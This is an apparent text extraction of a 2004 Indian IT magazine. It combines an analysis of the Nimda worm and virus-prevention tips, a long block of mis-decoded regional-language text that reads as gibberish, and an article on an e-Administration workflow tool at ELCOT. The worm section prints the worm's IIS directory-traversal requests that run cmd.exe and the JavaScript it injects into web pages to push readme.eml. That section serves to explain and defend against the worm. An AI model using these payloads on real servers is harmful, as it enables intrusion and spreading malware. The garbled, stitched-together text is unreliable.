GET cwinntsystem32cmdexec+dirGET dwinntsystem32cmdexec+dirGET MSADCrootexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scriptsxc1x1cwinntsystem32cmdexec+dirGET scriptsxc0winntsystem32cmdexec+dirGET scriptsxc0xafwinntsystem32cmdexec+dirGET scriptsxc1x9cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scripts2fwinntsystem32cmdexec+dirGET _vti_bin5c5c5cwinntsystem32cmdexec+dirGET _mem_bin5c5c5cwinntsystem32cmdexec+dirGET msadc5c5c5cxc1x1cxc1x1cxc1x1cwinntsystem32

cmdexec+dirOnce the worm found a vulnerable IIS server it would attempt to Trivial File Transfer Protocol

(TFTP) the worm code to the target server It would also modify the IIS server by creating a guestaccount and adding it to the Administrators group It would also create a Windows share of theC drive (using the name C$)

All local hypertext markup language (HTML) and Application Service Provider (ASP) fileswould be modified to include the following code snippet

ltscript language=JavaScriptgtwindowopen(readmeeml null resizable=notop=6000left=6000)ltscriptgtIn addition the worm would copy itself to the readmeeml file The final result was that

unsuspecting Web surfers would automatically download and possibly execute the worm froman infected Web site

The worm copies itself into EML and NWS in various local and network directories If anunsuspecting user uses Windows Explorer to browse a directory containing these files it is possiblethat the automatic preview function of Explorer would automatically execute the worm This wouldallow the worm to propagate over file shares on a local network

The worm also copies itself to richeddll which is an attempt to Trojan Microsoft Officedocuments since documents opened in the same directory as the richeddll binary will load andexecute the Trojan DLL

The end result was a noisy but very effective worm It was noisy because it created many EMLand NWS files on the local system It also modified Web pages on the Web site which made it easyto remotely detect a compromised server But the multi-infection methods proved quite effective andmany people who had run through and removed the worm had found that their systems keptgetting infectedit is a tough worm to fully eradicate To properly combat it the securityadministrator needed to patch their IIS server upgrade their Microsoft Outlook client and be cautiousof browsing network shares Full information on the Nimda worm is available in the Security Focusanalysis

httparissecurityfocuscomalertsnimda010921-Analysis-Nimda-v2pdf

OITS-2004

40

Some tips on prevention and responseProtecting systems and networks from the damage caused by Trojan horses viruses and

worms is mostly a matter of common sense Practices that can help prevent infection include thefollowing Do not run executable (EXE) files from unknown sources including those attached to an e-

mail or downloaded from web sites Turn off the Preview andor HTML mail options in the e-mail client program Do not open Microsoft Office documents from unknown sources without first disabling

macros Be careful about using diskettes that have been used in other computers Install and use firewall software Install antivirus software configuring it to run scans automatically at predefined times and

updating the definition files regularly Use intrusion prevention tools called behavior blockers that deny programs the ability to

execute operations that have not been explicitly permitted Use integrity checker software (such as Tripwire) to scan the system for changes Recognizing the presence of a malicious code is the first-response step if a system gets infected

Administrators and users need to be on the alert for common indications that a virus mightbe present such as the followingMissing files or programsUnexplained changes to the systems configurationUnexpected and unexplained displays messages or soundsNew files or programs that suddenly appear with no explanationMemory leaks (less available system memory than normal)Unexplained use of disk spaceAny other odd or unexplained behavior of programs or the operating system

- If a virus is suspected a good antivirus program should be installed and run to scan thesystem for viruses and attempt to remove or quarantine any that are found Finally allmission-critical or irreplaceable data should be backed up on a regular basis in case all thesemeasures fail

Virus writers are a creative and persistent bunch and will continue to come up with new waysto do the impossible so computer users should never assume that any particular file type or OSis immune to malicious code The only sure way to protect against viruses is to power down thecomputer and leave it turned off -)

Information about specific viruses and instructions on how to clean an infected system isavailable at httpwwwsymanteccom and httpwwwmcafeecom Both antivirus vendorsprovide detailed databases that list and describe known viruses But I recommend being touch withthe site httpwwwsecuritynewsportalcom here you will get hourly updates about latest securityhacking virus and trojan news

luckylucky-webnethttpwwwlucky-webnet

Orissa Network Security Group httpgroupsyahoocomgrouporissa-netsec

OITS-2004

41

LOtilde`EcircOcircVethornethorn S_ecirc J aTHORNLETHhOgraveSOcircETH[THORN eamp_ OgravekthornETH[ETH

LTHORNVccedil XTHORNcccedilXccedil aTHORNhegraveaTHORN]OcircETHfmacrAElig bEcircthornaOgrave_hegraveethorn

ASTHORNLETHmTHORNthorn LfETH aTHORNsETH_ aETHZTHORNSOcirc ethornETHS_Ntilde[THORNHaOtilde agrave_Ntilde[THORN A]THORN jcordfAElig Ogravel[oumlOgraveethorn LOtilde`EcircOcircVeethornthornakEcircthornf aOcircakthornETHethorn OgravekthornDRTHORNfrac14frac14ETH Ograve[ZEcirc HkTHORNthorn dsectAEligVTHORNaTHORNimacrAEligOgraveethorn LTHORNRTHORN SETHZTHORNaETH Acethorn jETHcETHSTHORNL LragravethornaOcircfrac14frac14ETHd]THORNJ LOtilde`EcircOcircVethorn aTHORNsETH_ HL A^Ecirc_THORNL aTHORN]OcircETHbthornETHaOgraveethorn `eTHORNthornNZTHORN[ HkthornETH `EcircethornETH[_ dEcircNeEcircthorn aTHORNhegraveethornjcordfAElig aTHORN]OcircETHOgraveethorn Aacutecurren akEcircthornOgrave[ D`OgravedETHN OgravekthornETHBAjEcircRTHORNfrac14frac14ETH HL]ETH SOgraveZ XETHbrvbarAEligethorn SOgraveZ LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL HaOtilde jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14 c^OcircOgraveethorn aTHORNaETH]mthornETHNTHORNmthornETHfrac14frac14ETH XETHbrvbarAEligethorn dEcircbrvbarTHORNAEligLOgravemthorn bthornNaETH_ccedil A]ETHcccedilEcircfrac14NYIumlTHORNOgravemthornfrac14frac14ETH Bbccedilthorn OgraveplusmnAEligETH`QETHethorn cETH^OcirccOgraveethorn A]ETHcccedilfrac14NbagravethorneEcircthorn AaTHORNbagravethornETHa OgravekthornOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn joacutefrac12THORNcurrenaYIumlTHORNQETHmTHORNthornmthornETHfrac14frac14ETH Ograve[ZEcirc XETHbrvbarAEligethornNtilde aTHORN]OcircETH kUacutethorn jaagrave EcircethornETH[_frac14frac14ETHHkthornETH hEcircZTHORN jTHORNbTHORNthornmccedilthorn dsectAEligNtilde LkTHORNthornOgravemthorn _UumlETH _UumlETH bthornNaETH_ccedil`otildeOgravec jegraveNagraveLEcirc _THORNcagraveETHZ LOgravemthornfrac14frac14ETH HkthornETH`Ograveethorn `oacuteTHORNaNtildejoacutefrac12THORNcurren OgravekthornmthornETHfrac14frac14ETH OgravejTHORN ETHBUuml jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14ethornAahOcircL[ETH OgravekthornETHBTHORNmthornETHfrac14frac14ETH Ograve[ZEcirc jTHORNbTHORNthornmccedilthorn BampTHORNfrac14_THORN AEligeTHORNOtildethornOgravekthornDRTHORN jaagrave EcircethornETH[_ aTHORN]OcircETHfrac14frac14ETH jaEcirc hEcircZTHORN LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL Aacutecurren kthornjTHORN Drthornethorn Ograve]Ogravemthorn A`ZcETHOgrave_`otildeOgrave[OcircL aTHORN]OcircETHLEcirc HL _THORN~Ugravefrac12curren LotildecOgraveethorn `otildeLETHhLeEcircthornRlaquoTHORNAEligAEligfrac14frac14ETH agraveETH[ccedil HL LETHdagraveOcirc jeTHORNthornaETH `Ograveethorn ]eacuteTHORN[NtildemacrAEligLETHdagraveOcirc LeTHORNthornaETHethorn `w[THORN OgraveLDUuml aTHORN]OcircETHOgraveethorn ethornkTHORNthornRTHORN HkthornETH hEcircZTHORNaETH`Ograveethorn XETHbrvbarAEligethorn HaOtilde jTHORNbTHORNthornmccedilthorn BOtildeSTHORN_THORN AEligethornordfAElig AEligAElig OgravekthornETHB dETHBTHORNOgravemthornfrac14frac14ETH HkthornETHkUacutethorn LOtilde`EcircOcircVethorn aTHORN]OcircETHethorncEumlfcsectAEligfrac14frac14ETH LOtilde`EcircOcircVethornethorn aTHORNaragravethorn_LEcirc _Ecirc OcircETH_ LOgravemthorn

AOgravecdividecETHOgrave_ SETHZTHORN ETHeTHORNthornaETH Ograved A^Ecirc_THORNL LOtilde`EcircOcircVethornethornS_L OgravekthornDRlaquoTHORNAEligAElig QETHmccedilthornjagrave aOcircETHOgraveaSccedilfrac14frac14ETH Ogravej 1834cjTHORNkthornETHOgraveethorn A_ETHmTHORNthornVTHORNLETHmccedilthorn BampTHORNfrac14_ccedil _ETHcLLOtilde`EcircOcircVethornVTHORNH DiexclthornETHa_ LeTHORNthornBOgravemthornfrac14frac14ETH `Ograveethorn `OgraveethornS_ccedil bTHORNthorn_THORNOgravejAtildeccedilcurren AVETH_ETHj$ccedilfrac14 HaOtilde LiacuteTHORNOgrave$frac14ETHXagraveIuml OgraveaeTHORNthorncTHORNhTHORN ABgETH Ogravefrac12currenVccedil macrEcircAElig_THORNbthornethornjTHORNVTHORNOgraveethorn `otildecBOgravemthornOgraveIacuteAEligETH_THORNLccediljccedil (Electronics) LOtilde`EcircOcircVethorn[THORNAeTHORNthorn LeTHORNthornTHORNOgravemthornfrac14frac14ETH HkTHORNthornWETHOgraveethorn kUacutethorn $frac14ETHfrac12currenOgraveSOgrave_Ograveethornj_ccedil (First Generation)LOtilde`EcircOcircVethornethorn S_ecirc OgravekthornETHBTHORNmthornETHfrac14frac14ETH ]eacuteTHORN[NtildemacrAElig aTHORNhegravedEcircwjcmacrAEligOgraveethorn H_THORNALccedil (ENIAC) LOtilde`EcircOcircVethorn _THORNcUgrave[OgravekthornETHBTHORNmthornETHfrac14frac14ETH 1946 cjTHORNkthornETHOgraveethorn _THORNcUgrave[ HkTHORNthornLOtilde`EcircOcircVethornLEcirc ethornMTHORNaETH `ETHBUuml 50 $Ecircfrac14Vccedil x 30 $Ecircfrac14VccedilOethornethorn AahOcircL[ETH OgravekthornETHBTHORNmthornETH HaOtilde HkthornETHethorn JS_THORNmthornETH 30 V_ccedilfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornOgraveethorn 18000bthornOcircETHLEcirccccedil VEcircOcircaccedil (Vaccum tube) mthornETHNTHORNTHORNmthornETHfrac14frac14ETHHkthornETH HL OgravejOgraveLumlAEligOgraveethorn 5000 `dagraveOcirclaquoAElig cTHORNhETHZ(Addition) LeTHORNthorn `ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETH c_EcirciOcircWETHeEcircthorn[OcirclaquoAEligAElig lTHORN otilde THORNmthornETHfrac14 j[ cETH[ouml aragravethorncETH_ethornLOtilde`EcircOcircVethornWETHeEcircthorn dOgravefrac12curren cxethorn THORNmthornETHfrac14frac14ETH `Ograveethorn `Ograveethorn1948 cjTHORNkthornETHOgraveethorn HLVagrave HaOtilde cOcircETHLccedilOgravemthorn cTHORNhTHORNHXccedilbthornETHLccedil (EDVAC) _ETHcL HL D_iuml[cETH_ethornLOtilde`EcircOcircVethornVTHORNH Ograve`_ccediljTHORNmccedilthornbthornETH_THORNAUuml aTHORNhegraveaTHORN]OcircETHfmacrAEligOgraveethornDiexclthornETHa_ LOgravemthornfrac14frac14ETH 1951Ograveethorn ]EcircOgravekthornUuml cTHORNhTHORN Ogravej_ccediljjccedilaEcircOcircOgraveethornETH (Census beaureau)Ograveethorn aOcircakthornETHethorn

OITS-2004

42

`ETHBUuml macrEcircAElig_THORNbthornETHLccedil LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LOgravemthornfrac14frac14ETH HTHORNOgraveethornQEcirccegraveLNtildemacrAElig OgraveV`ccedilOgraveethorn [Ocirc ethornkTHORNthornaETH Aethorncdivide OgravekthornmthornETHfrac14frac14ETHHkthornETH OgravekthornDRTHORN `otildec aOcircajETHmacrTHORNAEligL bTHORNthornrTHORNthornOgraveethorn aOcircakoacutethorn[LOtilde`EcircOcircVethornfrac14frac14ETH HkTHORNthorn `otildec `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn [oacuteVTHORNdEcircbrvbarAEligTHORNmthornETH HaOtilde Ograve_L SETHNETH cETHXIumlTHORN ajEcircTHORNmthornETHfrac14frac14ETH 1947cjTHORNkthornETHOgraveethorn Ograveamccedilthorn mthornETHOgraveaETHOgraveethornOgraveVETHeTHORNthornOgraveethorn (Bell Lab)VoumlETH_ccedilSTHORNfrac12currenethornethorn DiexclthornETHa_ OVTHORNTHORNmthornETHfrac14frac14ETH bthornOcircETHLEcirccccedil VEcircOcircaccedila]fOgraveethorn VoumlETH_ccedilSTHORNfrac12currenethornethorn aOcircakthornETHethorn ]eacuteTHORN[NtildemacrAElig `THORNYIumlNtildeethornLOtilde`EcircOcircVethornLEcirc S_ecirc Ograve]mthornETHfrac14frac14ETH Lcccedil Mnagrave OgraveRETHV ALETHethornHaOtilde ^THORNL aTHORNhegraveordfAElig OgravekthornETHBTHORNaETHeEcircthorn HkTHORNthorn `THORNYIumlNtildeethornLOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBmthornETHfrac14frac14ETH cETH[ouml NETHZTHORN[THORNLHaOtilde aOcircajETHmacrTHORNAEligL aTHORNOgravehyacuteiZ `ETHBUuml ]EcircB`otildeLETHethornethorn`w[THORN aOcircakoacutethorn[ OgravekthornDTHORNmthornETH dETHkthornETHLTHORN [OcirclaquoAEligAElig MnagraveETHlaquoAEligAEligaOcircETH`ETHethorn THORNmthornETHfrac14frac14ETH 1958Ograveethorn BAtildeTHORNcurrenOgraveNotildeOgraveVXccedil jLUgraveVccedil(Integrated circuit) DiexclthornETHaTHORN[ OgravekthornaETH`OgraveethornXTHORNSTHORNVETHmccedilthorn LOgrave`agraveETHOgraveethornj_ccedil (DigitalCorporation) OgraveNETHVTHORNH cTHORN_THORN LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETH dETHkthornETHLTHORN 15000 XmthornETHethornccedilOgraveethorn aTHORNLotildeTHORNOgravekthornETHBTHORNmthornETHfrac14frac14ETH `Ograveethorn ABaTHORNHcccedil (IBM) c^Ocirc[ETHethorn 360 jTHORNeTHORNthornSccedil (series) LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETHfrac14frac14ETH HkTHORNthornjaEcirc LOtilde`EcircOcircVethornNEcircXIumlTHORNL [oacute[NtildemacrAElig `THORNYIumlNtildeLOtilde`EcircOcircVethorn bthornETHaOgraveethorn `eTHORNthornNZTHORN[frac14frac14ETH `otildeOgravecOgrave`otildeETHNotildeETHcccedilethorncETHOgrave_ `iacuteNccedil OgraveaETHXagrave HaOtilde [ETHethorn aOcircakthornETHethornLeTHORNthorn LOtilde`EcircOcircVethorn jkthorn OgravedETHNETHOgravedETHN LeEcircthornTHORNOgravemthornfrac14frac14ETHHTHORNOgraveethorn 0 HaOtilde 1 LEcirc aTHORNbTHORNthorn_iuml YETHqETHOgraveethorn HAtildeoumlTHORNcurrenLethornETHdETHDTHORNmthornETHfrac14frac14ETH `Ograveethorn OgraveLETHamccedilthorn HaOtilde $frac14ethornccedilVoumlETH_ccedil `eTHORNthornbthornETHiETH HkTHORNthorn Lfrac12currenLethorn `w[THORNLEcirc jethornf LeTHORNthornOgrave]mthornETHfrac14frac14ETH1971 cjTHORNkthornETHOgraveethorn BOgraveAtildecurrenmccedilthorn _ETHcL HL LshyAEligETH_NtildecETHBOgraveLotildeETHOgrave`otildeETHOgravejjeccedilthorn (Microprocessor)

[THORNAeTHORNthorn LmthornETHfrac14frac14ETH HkthornETH kthornSETHethorn kthornSETHethorn VoumlETH_ccedilSTHORNfrac12currenethornLEcirc_THORNS c^OcircOgraveethorn HL OgraveRETHV QTHORN ccedil cETH^OcirccOgraveethorn ethornMTHORN`ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETHethorn D`ugraverTHORNthorn kUacutethorn Q[Ecircagrave `THORNYIumlNtildeLOtilde`EcircOcircVethornethorn S_ecirc OVETHBmthornETHfrac14frac14ETH HkthornETHethorn D`OgravedETHNOgravekthornaETH$frac14fOgraveethorn LOtilde`EcircOcircVethornethorn ALETHethorn AhETH[Ntilde[bthornETHaOgraveethorn LcTHORNNmthornETHfrac14frac14ETH Lcccedil Mnagrave HaOtilde ^THORNL OgraveaNHkthornETHLEcirc ^THORNL OgravemthornETHL`otildeTHORN AElig LethornETHBmthornETHfrac14frac14ETH 1981OgraveethornABaTHORNHcccedil (IBM) LshyAEligETH_Ntilde [ETHethorn `otildec`jagrave_ETHmccedilthorn LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornVETHBcccedil cETHNETHSTHORN_ccedil (Time Magazine) HkthornETHLEcircMan of the Year AMOcircETH Ograve]mthornETHfrac14frac14ETH Q[Ecircagrave`THORNYIumlNtildeethorn LOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBaETHeEcircthorn HkthornETHLEcircLTHORN eTHORNthorn Ograve]szlig_tTHORN_ LETHdagraveOcircOgraveethorn aOcircakthornETHethorn LeTHORNthornOgravekthornaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ [`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 37: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

OITS-2004

33

e-Administration is the brainchild of ICTand e-Gov specialist VDG Krishnan who hasover a quarter of a century hands-on managerialexperience in the Public Sector in India and aleading MNC in North South America He isthe Founder President of Life-Line to Business(LL2BCOM Pvt Ltd) His urge was to developa simple yet effective solution that can help totransform the Governments Corporates SMEsand NGOs The tool was conceived by him afterhis return to India as an apt solution for e-Governance in the developing world based onhis experience in both the developing and thedeveloped world

e-Administration is a web-enabledplatform-independent paperless solutiondeveloped on an Open Source platform forpaperless communication within and outsidean organization It uses open source offeringssuch as J2EE JBOSS PGSQL all running onLinux

The tool according to Krishnan canreduce the cycle time for file approval from anaverage of two to three weeks to one week Thiscan also result in a considerable reduction ofpaper-usage within an organisation therebysaving valuable natural resources

According to Krishnan LL2Bs toolempowers every employee in the organizationto discharge his or her duties efficiently It hasalso reduced the dependence on subordinatesand makes the organization system-orientedrather than people-centric This is likely to resultin increased productivity

Being a Linux platform local languagecontent can also be easily added This tool canbe used by any organization whose activitiesinvolve dealing with multiple agencies forsimultaneous review and action The tool also

aids knowledge management and integrationin NGOs for self-assessment decentralised fieldupdating and centralised review andmonitoring

The ProcessELCOT conducted trials with products

offered by four to five SMEs for independentevaluation with a view to adopt the best toolThe SMEs were asked to implement thenecessary customisations to suit therequirements of ELCOT Govt

Trials were conducted over three to twelvemonths with equal opportunity given to all thevendors In each department one system wasconfigured as the server and five nodes (on anaverage) connected as clients for live testing

Says K Appuswamy General Manager (e-Governance) Many organizations hadconducted trials but only LL2Bs model workedsuccessfully at ELCOT

LL2BCOMs product was one of the fiveLAN based solutions tried out the front-endwas based on Visual Basic while the backendwas Microsoft Access SQL running on aMicrosoft Windows 2000 server in the initialtrials This tool was initially installed inELCOTs Marketing Department for about 5officers Seeing the effective use of the tool moreofficers and staff came forward voluntarily touse the tool Steadily the number was increasedand the solution upgraded to a browser basedweb version for removing the dependence onclient systems

Currently e-Administration systemconnects about 150 users in three differentlocations spread over a distance of about 25 KMsincluding their Corporate Office at Nandanamtheir Communication Division at Perungudy

OITS-2004

34

and their Chairman Mr Vivek Harinarain IASwho is the Secretary IT Govt of Tamil Nadu atthe Secretariat through a dedicated powerfulfour-way Xeon dual Processor with RAIDfacility running a versatile Oracle 9i databaseas backend on Linux advanced server centrallylocated at ELCOT Corporate office

The tool simplifies the process of generatingfiles and enables moving note sheetselectronically for approval Instead of physicallycarrying note sheets for approval from table totable the employees began using the tool Receiptof the e-document was indicated by pop-up alertmessages on the officers monitors

All letters received from external agenciescould now be scanned and converted intoelectronic documents which would then beadded to the central repository This systemenables a user to check the status of a file at anystage More importantly delays are minimisedas the files can be traced instantly through thenetwork employees can now know whichofficer has kept the file pending

The biggest advantage of e-Administration is that it enables us to view atany stage the status of pending file The detailsare available on a central server and can beaccessed by anyone having the authority Thisway workflow is simplified

LL2Bs e-Administration tool not onlyeffects a dramatic reduction of stationary usageand time taken to process documents it alsoserves to introduce transparency in the workingof any organisation

The employees of ELCOT also took to thesystem rather well According to AppuswamyOur employees became more and morecomfortable with using the tool as the trialsprogressed Its quite user-friendly and doesnt

require a lot of technical expertise I myself beganusing the system without any formal trainingand have been using it successfully for eightmonths now

AccoladesAt the 7th National e-Gov conference held

in Chennai in November 2003 MD ELCOTreceived a merit citation award from Governmentof India for implementation of e-Administration as a tool for e-Governance

The Industrial Guidance Bureau of theGovernment of Pondicherry has implementedan integrated e-Platform a quickly customizedsolution of e-Administration to automate theactivities of the Department of Industries andCommerce (Refer Budget 2004-2005 Addressof HE the Lt Governor Pondicherry httpwwwp on nic inopend eptsf in anc elgspeech2004pdf)

Item 7 of the speech reads as followsRemoval of poverty may not be

practically possible without focusing specialattention on creation of gainful jobopportunities The Tenth plan at the nationallevel envisages creation of 50 million newemployment opportunities over a period of fiveyears Therefore focused attention will be givento few critical sectors such as

Industries Information Technology etcwhich have very high employment potential

Item 19 of the speech reads as followsThe manufacturing sector of the economy

has potential to absorb the surplus labour forceThe labour intensive manufacturing units canprovide gainful job opportunities for skilled aswell as semi-skilled labour force We willcontinue to encourage new entrepreneurs tochoose Pondicherry as their destination for

OITS-2004

35

establishing new industrial units andprocedures will be simplified to obtain licence permission to start units We will continue topursue the policies of promoting pollution freeless water and less power consuming industriesin our Union Territory

Item 20 of the speech reads as followsIndustrial Guidance Bureau with

integrated e-Platform has been established bysubstituting single window clearance system tospeed up the process of industrial clearance permission for setting up of new industrial unitsA total of 21 Departments includingMunicipalities Commune Panchayats havebeen integrated with a dedicated electronicnetwork for granting permission to set up anindustry and also to commence production

This saves a lot of time effort and cost toindustrialists and citizens as well as officials ofvarious Departments As against submitting 10copies of documents in the manual system inthe electronic system only one signed copy needsto be submitted thereby saving 90 of paperresulting in conserving of natural forestresources

